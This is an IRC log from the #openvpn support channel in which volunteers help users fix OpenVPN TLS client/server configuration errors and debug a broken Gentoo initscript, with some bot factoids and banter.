18:35 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 245 seconds]
18:37 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
18:37 -!- mode/#openvpn [+v s7r] by ChanServ
18:40 -!- eHAPPY [~V1CE@ip174-73-3-95.no.no.cox.net] has left #openvpn []
18:42 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 252 seconds]
18:45 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
18:45 -!- mode/#openvpn [+v s7r] by ChanServ
18:46 -!- DBordello [~DBordello@unaffiliated/dbordello] has quit [Ping timeout: 264 seconds]
18:47 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn
18:48 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 245 seconds]
18:50 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 245 seconds]
18:53 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
18:53 -!- mode/#openvpn [+v s7r] by ChanServ
18:58 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 260 seconds]
19:00 -!- Wulf [~Wulf@port-35127.pppoe.wtnet.de] has joined #openvpn
19:00 -!- Wulf [~Wulf@port-35127.pppoe.wtnet.de] has quit [Changing host]
19:00 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn
19:01 -!- JSharpe [~JSharpe@46.165.221.13] has quit [Quit: Leaving]
19:04 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn
19:04 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Quit: ZNC - http://znc.in]
19:06 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 276 seconds]
19:06 -!- Denial- is now known as Denial
19:07 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
19:07 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn
19:20 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
19:20 -!- mode/#openvpn [+v s7r] by ChanServ
19:23 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn []
19:23 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
19:48 -!- raidz is now known as raidz_away
19:55 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
19:57 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 252 seconds]
19:59 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
20:01 < vaillor> Options error: Parameter ca_file can only be specified in TLS-mode, i.e. where --tls-server or --tls-client is also specified.
20:01 < vaillor> I get this error
20:01 < vaillor> what is it?
20:03 < pekster> Using the --ca directive isn't valid unless you're operating in a mode supporting X509 (TLS) authentication
20:06 < vaillor> so, what do I need to do?
20:07 < vaillor> pekster: http://pastebin.com/5r2fubWt
20:07 < vaillor> this is my config
20:07 < vaillor> client side.
20:08 < pekster> Use a client mode of operation then. --tls-client at the very least, and possibly --pull as well. See the --client helper-directive for details on what it all includes
20:11 < vaillor> Sun Mar 10 00:31:02 2013 TLS Error: client->client or server->server connection attempted from [AF_INET]192.168.1.130:1194
20:11 < vaillor> WTF!
20:16 < pekster> One side of your connection must at as the "server" and the other the "client" 20:16 < pekster> --tls-server and --tls-client respectively 20:19 < vaillor> pekster, if i add " tls-server " into config.ovpn is the same? 20:20 < pekster> In what context? On your server? 20:20 < vaillor> yes 20:20 < pekster> You probably want both --tls-server and --mode server 20:21 < pekster> Or see the --server directive in the manpage. Use of --server implies a lot of things, including --mode server --tls-server --ifconfig and --ifconfig-pool setup for a "typical" server 20:21 < vaillor> pekster, can you tell me the correct line format that i need to add? 20:21 < pekster> That depends greatly on your setup 20:21 < pekster> There's no one "correct line" that fits everyone's needs. This is why sample configs are provided as a starting point with liberal comments to help you understand what they each do 20:21 < pekster> I'd rather teach you to understand what you need to do than just give you a config 20:22 < pekster> What specifically are you having trouble understanding? 20:23 < vaillor> pekster, i'm understanding how to give --tls-client and --tls-server into respective configuration files 20:23 < vaillor> if i add "--tls-client" into the configuration files, i get error 20:23 < pekster> So, the easiest thing to do is to use the "--server" direcive on the server. That options requires that you define a network and mask as paramaters for the virtual network your server will use 20:24 < pekster> Then use "--client" (no params needed) on the client, which has it act as a client and pull configuration from the server 20:24 < vaillor> ok, then i add "server" into server.ovpn 20:24 < vaillor> and client into client.ovpn 20:24 < vaillor> it's ok? 20:27 < pekster> Did you read the part above where I said the server directive takes paramaters? Did you look the paramaters up in the manpage or the sample config file in the howto? 
What did you learn about how you must apply your chosen VPN network range to this paramater? 20:29 < vaillor> I am very tired, I spent half a day to figure out how to create and configure certificates, I did. now I want to be slightly helped set up the other parameters. here in Italy is night 20:30 < vaillor> server: http://nopaste.info/c4f29251bb.html 20:31 < vaillor> client: http://nopaste.info/61d18b7e89.html 20:32 < pekster> Your server directive doesn't have the required format (manpage and samples are your friend.) You don't want to use ifconfig with server. You have tap on one side and tun on the other. Your comp-lzo settings are mismatched. 20:32 < pekster> The sample config file would be a much better place to start, as would following the howto 20:33 < vaillor> server 10.10.10.0 255.255.255.0 20:33 < vaillor> should be better? 20:33 < pekster> Yup 20:34 < pekster> Use the same 'dev' type on both sides, and remove your 'ifconfig' on the server. Please consult the manpage for the "--server" directive and you'll see it already includes that 20:34 < pekster> And comp-lzo needs to match on both sides of your setup 20:35 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 20:35 < vaillor> Sun Mar 10 00:56:02 2013 TLS Error: client->client or server->server connection attempted from [AF_INET]192.168.1.130:119 20:36 < vaillor> i get the same f*****g error 20:36 < vaillor> server 20:36 < vaillor> dev tap 20:36 < vaillor> proto udp 20:36 < vaillor> server 10.10.10.0 255.255.255.0 20:36 < vaillor> this is what i set into server side 20:37 < pekster> Why are you using tap? 20:37 < pekster> !tunortap 20:37 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. 
or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 20:37 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 20:37 < pekster> Don't use tap unless you have a need for it. It's also invalid to use tap on one side a tun on the other, as you have done 20:38 < vaillor> never changed 20:39 < vaillor> http://pastebin.com/dwtdpx39 20:39 < vaillor> i'm still crying 20:40 < vaillor> this is client side config 20:40 < pekster> The pastes earlier showed tap on the server and tun on the client 20:40 < pekster> You *cannot* do this 20:40 < pekster> Square peg, round hole. 20:42 < vaillor> pekster, now is tun on both side 20:48 < vaillor> Options error: Unrecognized option or missing parameter(s) in config.conf:3: tsl-client (2.1.3) 20:55 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 20:57 -!- fulcan [brads@2600:3c00::f03c:91ff:fe70:f0a9] has joined #openvpn 20:59 < fulcan> I have 2 openvpn configurations for 2 different tunnel. prior to an update I had pretty init.d scripts that would launch each tunnel with their own config file. now so st00pid develeloper decided to change init and now the the only way I can get openvpn to work is with /usr/sbin/openvpn --config /etc/openvpn/connect.conf which is no good.. How do unfuq init? 21:00 < fulcan> init fails here -> VPNCONF="${VPNDIR}/${VPN}.conf" 21:01 < pekster> How about install the stock initscript for your distro? 21:01 < pekster> And teach your devs about revision control 21:02 < fulcan> pekster the stock is what is failing /etc/init.d/openvpn fails to find config file now 21:04 < fulcan> pekster 3 different systems got updated yesterday and all 3 share the exact same issue, at the same time. 
21:05 < pekster> The "official" source package openvpn provides has an rhel and suse init setup. Other distros provide their own init systems 21:06 < fulcan> gentoo 21:06 < fulcan> here 21:06 < vaillor> pekster, please, can you tell me the right configuration? i'm becoming mad 21:09 < pekster> fulcan: Gentoo uses symlinks to determine the config name from the script 21:09 <@EugeneKay> Oy, gentoo. 21:09 -!- fulcan [brads@2600:3c00::f03c:91ff:fe70:f0a9] has quit [Disconnected by services] 21:09 <@EugeneKay> And you're surprised when the entire thing randomly eats its own head? :-p 21:09 < pekster> EugeneKay: Well, I like it, but I am quite familiar with how it works 21:10 < pekster> Better than having to figure out how to make one of the 2 VPNs running restart cleanly from an init system that isn't designed to uniquely control each process and just blindly starts them all in succession :( 21:10 -!- qmr [~qmr@50.116.18.140] has quit [Ping timeout: 250 seconds] 21:10 < pekster> (that was a Not So Fun Day in NetBSD land. I like a lot of what NetBSD does, but not that, on that day._) 21:11 -!- fulcan [brads@2600:3c00::f03c:91ff:fe70:f0a9] has joined #openvpn 21:11 < pekster> Did you anger the service gods? :P 21:11 -!- qmr [~qmr@50.116.18.140] has joined #openvpn 21:11 < pekster> fulcan: So, you should have a symlink like /etc/init.d/openvpn.configname -> openvpn 21:12 < pekster> That will correspond to a config file at /etc/openvpn/configname.conf 21:12 < fulcan> pekster clear wireless service sux, but it's cheap too 21:12 < pekster> Unless you hacked the initsscript, that's how it's been that way for many years 21:16 < DougEFresh> ayo 21:16 < fulcan> pekster yes, I have 2 /etc/openvpn/openvpn.conf and /etc/openvpn/connect.conf which correspond with /etc/init.d/openvpn and /etc/init.d/openvpn.connect the two always worked together perfectly, for like 6 months and then a routine update yesterday broke it. 
I even tried setting a stating value VPNCONF="/etc/openvpn/openvpn.conf", but init failed to read the static value 21:17 < pekster> Nope, you want /etc/init.d/openvpn.openvpn if you have an openvpn.conf 21:17 < pekster> Note the initscirpt line for VPN=${SVCNAME#*.} 21:18 < pekster> That is pretty standard for gentoo's initscripts when they support multiple concurrent instances with independent init control 21:18 < pekster> It scrapes off the leading "foo." from the name you called the script with 21:18 < fulcan> o 21:18 < pekster> IMO that's also a very bad name for a config, but it's not disallowed ;) 21:19 < vaillor> TLS Error: client->client or server->server connection attempted from 192.168.1.130 21:19 < pekster> It's almost as silly as naming a network interfaces "net" and then you end up with a /etc/init.d/net.net interface ;) 21:19 < vaillor> sounds like a TSL handshake error 21:19 < vaillor> right? 21:20 < vaillor> i tried modifying some other stuff but i get the same thing 21:20 < pekster> s/interface/initscript/ 21:21 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 272 seconds] 21:23 < fulcan> http://pastie.org/6457206 it doesn't like openvpn.openvpn either 21:24 < pekster> What do thte logs say? 21:24 < pekster> You should hopefully have configured your /etc/openvpn/openvpn.conf sanely to log somewhere helpful ;) 21:25 < pekster> The one dumb thing Gentoo does is try to change user on you. You can either disable this "feature" or just use 'user root' 'group root' in your configs to avoid such "intelligent" decisions 21:25 < pekster> That should be an opt-in feature, not opt-out, but it's managable if you know about it 21:26 < pekster> I guess it's more "secure" to do that, but it's unexpected 21:26 < fulcan> pekster the logs are completely bare of anything openvpn in messages. it is as though because of the disconnect from init, it is completely oblivious to system messaging. 
:/ 21:26 < pekster> Where are you logging? 21:27 < pekster> OpenVPN does not simply "not log" when it fails to start 21:27 < fulcan> messages 21:27 < pekster> So you have *no* log or log-append directive in your openvpn.conf file? 21:29 < pekster> fwiw, I guess the initscript should attempt to use openvpn.conf if you call it via /etc/init.d/openvpn (since there's no leading string matching "*." it won't remove anything.) It's still not a great idea to do that 21:31 < fulcan> pekster If I start it the long way and manually point it to the --config file, it logs normally. openvpn is throwing in some default config and it log nothing. 21:32 < fulcan> via init 21:33 < pekster> Can you add an echo in front of the start-stop-daemon in the initscript and paste what it spits out? 21:34 < fulcan> http://pastie.org/6457302 21:36 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 21:36 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Operation timed out] 21:38 < fulcan> btw, I updated 5 systems yesterday and all 5 are having the same issue 21:38 < pekster> I want to know what ssd is doing 21:38 < pekster> YOu clearly didn't add an "echo" in front of that line 21:39 < pekster> http://paste.kde.org/693926/ 21:39 * pekster thinks he's getting the hang of this git thing... :) 21:40 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 21:48 < pekster> Either SSD is doing something wrong enough to fail to call /usr/sbin/openvpn properly, or the logs from openvpn get lost. Even at 'verb 0' openvpn still logs fatal errors that would prevent a startup 21:51 < pekster> fulcan: For the record, I can launch /etc/init.d/openvpn fine with /etc/openvpn/openvpn.conf 21:53 < pekster> Pastebin your openvpn.conf somewhere 21:53 < fulcan> are you on gentoo? and I am supposed to diff that code you sent and create a .patch? 
21:54 < pekster> that link was a patch, but nevermind that; your config is at the moment more interesting to me 21:54 < pekster> (the "diff " at the beginning gives it away as a patch) 21:55 < pekster> And yes. I'm running 2.3.0 openvpn ~x86 on Gentoo. Initscript works finei 21:56 < pekster> Oh, and in the future symlink, don't copy init.d files 21:56 < pekster> Look at your net.* stuff for an example of how it's supposed to look 21:58 < pekster> Things should look like this: http://paste.kde.org/693932/ 22:00 < fulcan> http://bpaste.net/show/83107/ 22:01 < fulcan> http://paste.kde.org/693938/ 22:01 < pekster> -p0 likely 22:01 < pekster> Oh, hum... 22:02 < fulcan> the config file is perfect. it's just that init never gets it 22:02 < fulcan> same garbage output with -p0 22:03 < fulcan> cat /etc/openvpn/openvpn.conf|wgetpaste 22:03 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 22:05 < pekster> Oh, patsebin screwed up the patch spacing :( 22:06 < pekster> Not like it's a complicate change... 22:06 < pekster> +d 22:13 -!- TypoNe [~itsme@195.197.184.87] has quit [Quit: I shouldn't really be here - dircproxy 1.1.0] 22:13 -!- TypoNe [~itsme@195.197.184.87] has joined #openvpn 22:18 < fulcan> I added the line echo start-stop-daemon --start --exec /usr/sbin/openvpn --pidfile "${VPNPID}" \ and still got no log output "manual patch". 22:21 < pekster> Then you did something wrong 22:22 < pekster> Output on your terminal should pretty obviously echo that to the terminal. http://paste.kde.org/693944/ 22:22 < pekster> Let me know if you manage to figure it out 22:23 < fulcan> pekster http://bpaste.net/show/83111/ 22:24 < pekster> Nope 22:24 < pekster> Add an echo 22:24 < pekster> Not add crap to the middle of ssd 22:25 < pekster> if /bin/whatever $stuff fails, you don't do /bin/whatever $stuff echo $morestuff. You do: echo /bin/whatever $stuff 22:25 < fulcan> pekster line 114? 
22:26 < pekster> Remove/comment 113 22:26 < pekster> Note the backslash on the end? You're just spewing worthless (and inherently broken, since "echo" is not a command ssd knows) to the middle of a command 22:33 < fulcan> pekster in your patch you have an escape \ at the end of that line. You are saying "don't" escape line 114? I get a bad command error. 22:35 < ngharo> !fail2ban 22:35 <@vpnHelper> "fail2ban" is in linux you can replace fail2ban without the background process with something like: iptables -A INPUT -m tcp -p tcp --dport 22 -m hashlimit --hashlimit-name ssh --hashlimit-upto 5/minute --hashlimit-mode srcip --hashlimit-srcmask 24 -j ACCEPT 22:35 -!- Teck7 [~teck7@76.65.61.190] has joined #openvpn 22:36 -!- vraa__ [~speed_rac@98.196.168.201] has joined #openvpn 22:36 < fulcan> ngharo it doesn't work very well 22:36 < ngharo> whys that 22:36 < fulcan> door gets stuck all the time 22:37 < fulcan> crap debugging (or what I could find) 22:37 -!- rfxn [~teck7@69.157.149.169] has quit [Ping timeout: 245 seconds] 22:38 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 252 seconds] 22:42 < fulcan> pekster I got the echo to work, and it spit out the parameters, but nothing in the logs http://pastie.org/6457580 22:48 < fulcan> right now my tunnel is up 22:51 < pekster> You're logging to syslog, so the fact that you get "nothing" in messages suggests syslog isn't working right. You can always add 'log-append /tmp/openvpn.log' or something to the openvpn.conf file 22:52 < pekster> init looks fine 22:53 < pekster> There's likely an error starting openvpn and it's note getting sent to syslog. You need to fix your system logging 22:53 < pekster> not* 22:56 < fulcan> I got it up and now I can't repeat what I did 22:57 < fulcan> what am I missing /etc/init.d/openvpn.openvpn: line 114: --: command not found http://bpaste.net/show/83113/ ?? 
23:00 <@EugeneKay> You have a trailing space on 113 23:01 <@EugeneKay> This is why \\n is evil 23:02 < fulcan> Well, get this, I'm up after removing trailing space and adding echo. If I remove echo, it won't restart. wtf? 23:03 < fulcan> at least I got a fix, but 'huh?' 23:08 < fulcan> but I came up under a different tun 23:16 < pekster> It'll "start" when using the echo because it's not actually starting the openvpn process 23:16 < pekster> Just echoing what it would do to call ssd 23:18 < pekster> You can scrape that off; the output you pasted earlier looks fine for what ssd should be doing 23:18 < fulcan> openvpn starts and I can see the ip on both tuns, but I cannot ping down the tunnel, nor can other connect to me. logs are still bare http://pastie.org/6457692 23:19 < pekster> Did you put the initscript back? 23:19 < pekster> Or at least duplicate the actuall start-stop-daemon command after the echo line? 23:21 < pekster> The lack of logs is a problem (as I said before, maybe your syslog isn't operating as you intended?) Add the 'log' or 'log-append' option to your configs manually to get proper log output sent at least somewhere useful 23:25 < fulcan> Nope, there is something deeper going on. even -> /usr/sbin/openvpn --config /etc/openvpn/connect.conf clients still cannot connect 23:26 * pekster thought the issue was starting it without it denoting failure 23:28 < fulcan> that was/is, don't know. The same config worked for 6 months and we restarted the machine many times since. this started after yesterday's update. 23:30 < fulcan> and at this point the 'omly' thing I have done, is add an echo to the front of that line in the init scripts. 23:32 < pekster> Right. Remove it. If you don't have much bash scripting, leaving it in is a debugging thing only and doesn't actually do anything to start your VPN. 
It just "echoes" what it would do 23:32 < pekster> (and I'm sorry to say if that's an issue, Gentoo probably isn't the right distro) 23:33 -!- wachpwnski [~wachpwnsk@67.176.229.52] has quit [Quit: Leaving.] 23:33 < fulcan> why would adding a echo be the difference between it starting and it failing to start? 23:33 * pekster sighs 23:33 < pekster> Becuase it's just printing text. It "successfully" printed the text 23:33 < fulcan> if I remove the echo, it won't start 23:33 < pekster> Right. because something is broken 23:33 < fulcan> the port goes up! 23:33 < pekster> http://sources.gentoo.org/cgi-bin/viewvc.cgi/gentoo-x86/net-misc/openvpn/files/openvpn.init?view=log 23:34 <@vpnHelper> Title: [gentoo-x86] Log of /net-misc/openvpn/files/openvpn.init (at sources.gentoo.org) 23:34 < pekster> The initscsript hasn't changed in 3 years 23:34 < pekster> The "stupid developers" as you so aptly worded it, haven't touched the init 23:38 -!- brute11k [~brute@89.249.235.15] has joined #openvpn 23:39 < pekster> Check to make sure the changes you've made don't break something unintended: http://sources.gentoo.org/cgi-bin/viewvc.cgi/gentoo-x86/net-misc/openvpn/files/openvpn.init 23:42 < pekster> Hmm, actually, no clue what that link is 23:42 < pekster> Sorry, ignore that last link 23:43 < pekster> This is the right one (upstream had a stupid naming scheme) http://sources.gentoo.org/cgi-bin/viewvc.cgi/gentoo-x86/net-misc/openvpn/files/openvpn-2.1.init 23:43 < pekster> Erm, downstream 23:43 < pekster> :) 23:46 < pekster> k, init is indeed fine (once you fix the debugging thing.) The rest of your changes are cosmetic. 
My guess is any issues you have are a result of the user downgrading happening 23:51 < pekster> Make sure your init has been reverted (or better yet, just do 'cp /usr/portage/net-misc/openvpn/files/openvpn-2.1.init /etc/init.d/openvpn' to gaurentee it's fixed) and here's some proof of concept to run: http://paste.kde.org/693950/ (back up openvpn.conf first, since this'll overwrite it) 23:53 < pekster> If that fails, it'll be important to figure out why 23:53 < pekster> If not, it's something in your config that's the issue, possibly made worse by syslog issues 23:54 < pekster> Again, note that the initscirpt does not just "start the config" -- it adds options to the command-line call 23:55 < fulcan> fortunately I have good backups and am restoring to prior to update. 23:56 < pekster> Well, figuring out why would be better. clearly something changed (and it wasn't anything to do with the initscript.) 23:57 < pekster> OpenVPN hasn't had anything of note in the changelog since 09 Feb 2013, and that was a minor change to the up.sh script. Last change before that was 25 Jan 2013, adding 2.3.0 23:57 < pekster> No clue what "else" you updated, but I'm pretty confident your issue isn't the initscript or any change in gentoo's openvpn package/ebuild 23:58 < pekster> At least not the shipped initscript --- Day changed Tue Mar 12 2013 00:02 < fulcan> http://bpaste.net/show/83118/ 00:02 < fulcan> march 10 00:04 < pekster> So what? You build a package. Congrats. Maybe your compile screwed up. I'm talking about source changes. Things those of us who develop and contributed to Gentoo and/or OpenVPN code can actually do something about 00:05 -!- GabeTheBabe [~toomuchfo@75-170-24-37.eugn.qwest.net] has joined #openvpn 00:06 < pekster> Thanks for trying to blame us "st00pid dev"s. Protip: gentoo mgiht not be for you if you update 58 packages, none of them openvpn, and you attempt to blame the change on an initscript that hasn't changed for 3 years. I'm done. 
00:07 < GabeTheBabe> Hello, is there anyone here that can help me with my issue? I've been getting this error on my vpn client since I connected my computer up to a tv. http://i.imgur.com/nTOpKfV.png 00:07 <@EugeneKay> http://funroll-loops.info/ 00:07 <@vpnHelper> Title: Welcome to Gentoo is Rice, the Volume goes to 11 here. (at funroll-loops.info) 00:07 <@EugeneKay> GabeTheBabe - "VPNTunnel" is not OpenVPN. Sorry. 00:07 <@EugeneKay> Try talking to your service provider's support. 00:08 < pekster> EugeneKay: Volume only goes to 11? I'll sell you a gcc that goes to 12 for just $50k ;) 00:08 <@EugeneKay> It looks to me like a shitty Java stack 00:08 < GabeTheBabe> I know it's not :o it's been 4 days and I've got like 3 left on my VPN anyways :x 00:08 <@EugeneKay> pekster - zomg does it -O3? 00:08 < pekster> -O999 00:08 < pekster> geez :P 00:08 < GabeTheBabe> gonna not resub if they don't email me a fix :P 00:09 -!- vraa__ [~speed_rac@98.196.168.201] has quit [Ping timeout: 245 seconds] 00:10 < GabeTheBabe> openvpn is a pain to setup with certs and stuff T_T 00:11 <@EugeneKay> XCA makes PKI a lot easier 00:12 < GabeTheBabe> people have to be familiar with acronyms for them to be effective :P 00:13 < pekster> It would naturally help if you GNU them all in advance 00:13 < pekster> !xca 00:13 <@vpnHelper> "xca" is (#1) XCA is a GUI to create/manage a PKI, much more user-friendly than easy-rsa. 
or (#2) Example XCA PKI for OpenVPN(writeup pending): https://community.openvpn.net/openvpn/wiki/XCA 00:19 < p3rror> hello 00:19 < p3rror> please Why I get this error TLS Error: Unroutable control packet received from [AF_INET] 00:19 < p3rror> whe i try to connect 00:25 < p3rror> pekster, you there 00:25 < p3rror> please can you help 00:33 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Excess Flood] 00:35 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 00:45 -!- GabeTheBabe [~toomuchfo@75-170-24-37.eugn.qwest.net] has left #openvpn [] 01:07 -!- p3rror [~mezgani@41.140.169.138] has quit [Ping timeout: 245 seconds] 01:09 -!- merica [~aMERICA@75.111.203.42] has joined #openvpn 01:15 -!- p3rror [~mezgani@41.140.169.138] has joined #openvpn 01:17 -!- p3rror [~mezgani@41.140.169.138] has quit [Max SendQ exceeded] 01:17 -!- p3rror [~mezgani@ds-59836.dedicados.laniway.com.br] has joined #openvpn 01:22 -!- merica [~aMERICA@75.111.203.42] has quit [Read error: Connection reset by peer] 01:22 -!- p3rror [~mezgani@ds-59836.dedicados.laniway.com.br] has quit [Quit: Leaving] 01:23 -!- merica [~aMERICA@75.111.203.42] has joined #openvpn 01:41 -!- merica [~aMERICA@75.111.203.42] has quit [Read error: Connection reset by peer] 01:43 -!- merica [~aMERICA@75.111.203.42] has joined #openvpn 01:43 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 02:12 -!- merica [~aMERICA@75.111.203.42] has left #openvpn [] 02:56 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 02:58 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Client Quit] 03:08 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 03:27 -!- dropje [~yge@ip4da6274e.direct-adsl.nl] has quit [Ping timeout: 256 seconds] 03:28 -!- brute11k1 [~brute@89.249.235.15] has joined #openvpn 03:29 -!- brute11k [~brute@89.249.235.15] has quit [Ping timeout: 245 seconds] 03:31 -!- brute11k [~brute@89.249.235.15] has joined #openvpn 03:32 -!- brute11k1 [~brute@89.249.235.15] has quit [Ping timeout: 252 seconds] 03:42 -!- 
brute11k [~brute@89.249.235.15] has quit [Ping timeout: 255 seconds] 03:43 -!- p3rror [~mezgani@ds-59836.dedicados.laniway.com.br] has joined #openvpn 03:47 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 04:24 -!- zz_AsadH is now known as AsadH 05:14 -!- p3rror [~mezgani@ds-59836.dedicados.laniway.com.br] has quit [Ping timeout: 260 seconds] 05:23 < jzaw> pekster, that weird asymmetrical ping on the tun vpn ... fixed M0N0WALL arrgh 05:23 < jzaw> http://photos.dzki.co.uk/m0n0wall_adv_setting_bypass_fw_same_interface.png 05:23 < jzaw> possibly something to do with icmp redirect 05:23 < jzaw> anyhoo thanks for all your help 05:27 -!- p3rror [~mezgani@41.140.169.138] has joined #openvpn 05:35 -!- hatschi [~marvin@host-62-245-234-8.customer.m-online.net] has joined #openvpn 05:36 < hatschi> hi all 05:38 < hatschi> pekster: are you there? 06:01 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 06:02 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 06:07 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Ping timeout: 256 seconds] 06:13 -!- mjixx [~markus@80.67.14.31] has quit [Ping timeout: 245 seconds] 06:14 -!- Bakou [~meh@199.101.117.191] has joined #openvpn 06:15 < Bakou> hey guys, I am doing a little experiment and trying to tunnel openvpn through a udp tunnel I wrote 06:15 < Bakou> but after accepting the handshake and getting connected no data can be sent 06:16 < Bakou> is there some limitation about both the client and server being at localhost,or forwarding the packets? 
06:16 < Bakou> the same thing works fine through SSH tunneling w/ tcp 06:20 -!- mjixx [~markus@80.67.14.31] has joined #openvpn 06:25 -!- Bakz [~meh@210.56.51.163] has joined #openvpn 06:29 -!- Bakou [~meh@199.101.117.191] has quit [Ping timeout: 256 seconds] --- Log closed Tue Mar 12 06:35:29 2013 --- Log opened Tue Mar 12 06:35:43 2013 06:35 -!- ecrist_ [~ecrist@token-black.secure-computing.net] has joined #openvpn 06:35 -!- Irssi: #openvpn: Total of 174 nicks [8 ops, 0 halfops, 2 voices, 164 normal] 06:36 -!- Irssi: Join to #openvpn was synced in 45 secs 06:37 -!- lbft__ [~lbft@199.195.249.177] has joined #openvpn 06:38 -!- soapee01_ [~soapee01@24-155-219-177.dyn.grandenetworks.net] has joined #openvpn 06:38 -!- piele_ [~Unknown@bakzeil.creativeserver.net] has joined #openvpn 06:39 -!- feth_ [foobar@ile-flottante.tuttu.info] has joined #openvpn 06:40 < vaillor> TLS Error: client->client or server->server connection attempted from 229.76.227.83:5001 06:40 < vaillor> could it be a problem with certificates? 06:43 -!- simcop2387_ [~simcop238@p3m/member/simcop2387] has joined #openvpn 06:43 -!- Netsplit *.net <-> *.split quits: _quadDamage, +soapee01, simcop2387, vect0rx, @ecrist, feth, lbft, DrCode, piele 06:43 -!- simcop2387_ is now known as simcop2387 06:48 -!- feth_ is now known as feth 06:53 -!- marksaitis [~marksaiti@81.101.81.114] has joined #openvpn 06:57 -!- You're now known as ecrist 06:58 -!- mode/#openvpn [+o ecrist] by ChanServ 07:04 -!- kubbing [~kubbing@c-006.certicon.cz] has joined #openvpn 07:13 -!- kubbing [~kubbing@c-006.certicon.cz] has quit [Ping timeout: 252 seconds] 07:14 -!- kubbing [~kubbing@gprs29.vodafone.cz] has joined #openvpn 07:15 -!- dazo_afk is now known as dazo 07:25 <@ecrist> !ubuntu 07:25 <@vpnHelper> "ubuntu" is dont use network manager! 07:25 <@ecrist> !networkmanager 07:25 <@ecrist> !netman 07:26 <@vpnHelper> "netman" is if you are using network manager for linux to configure your vpn, dont! 
http://openvpn.net/archive/openvpn-users/2008-01/msg00046.html to read the same thing from the author of the openvpn 2 cookbook on the mail list 07:30 < vaillor> ecrist,, do do you think that "TLS Error: client->client or server->server connection attempted from 229.76.227.83:5001" is a problem about certificates? 07:31 <@ecrist> anything, generally, that mentions TLS Error has to do with certificates 07:32 -!- newbie [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has joined #openvpn 07:32 < vaillor> ecrist: http://pastebin.com/NRC1dCMk 07:32 < vaillor> this is my config 07:33 < vaillor> what do you thing should be the problem? 07:33 <@ecrist> !logs 07:33 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 07:36 < vaillor> ecrist, server side or client side? 07:36 <@ecrist> yup 07:36 < vaillor> both? 07:36 <@ecrist> yup 07:36 <@ecrist> it says that, above 07:36 <@ecrist> 07:33:56 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server 07:36 < vaillor> yes, sorry 07:37 < vaillor> on windows gui is blank 07:37 < vaillor> i don't know why 07:37 < vaillor> !logfile 07:37 <@vpnHelper> "logfile" is (#1) openvpn will log to syslog if started in daemon mode. 
